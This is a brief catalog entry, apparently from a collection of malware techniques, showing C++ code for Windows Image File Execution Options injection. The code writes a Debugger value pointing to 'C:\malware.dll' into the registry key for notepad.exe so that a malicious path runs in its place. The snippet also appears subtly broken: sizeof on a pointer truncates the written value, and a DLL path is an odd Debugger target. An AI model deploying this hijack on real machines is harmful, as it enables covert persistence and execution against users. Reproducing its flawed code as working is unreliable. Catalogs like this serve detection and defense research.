Windows C++ / Image File Execution Options Injection
Author | Thomas Roccia (fr0gger) |
Platform | Windows |
Language | C++ |
Technique | Image File Execution Options Injection |
Code
#include <Windows.h>
#include <TlHelp32.h>
int main()
{
HKEY hKey;
LPCTSTR subkey = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe";
LPCTSTR value = "Debugger";
LPCTSTR data = "C:\\malware.dll";
DWORD dwSize = sizeof(data);
// create or open the IFEO registry key
RegCreateKeyEx(HKEY_LOCAL_MACHINE, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
// set the Debugger value to the path of the malicious DLL
RegSetValueEx(hKey, value, 0, REG_SZ, (LPBYTE)data, dwSize);
RegCloseKey(hKey);
}
Created
January 15, 2023
Last Revised
April 22, 2024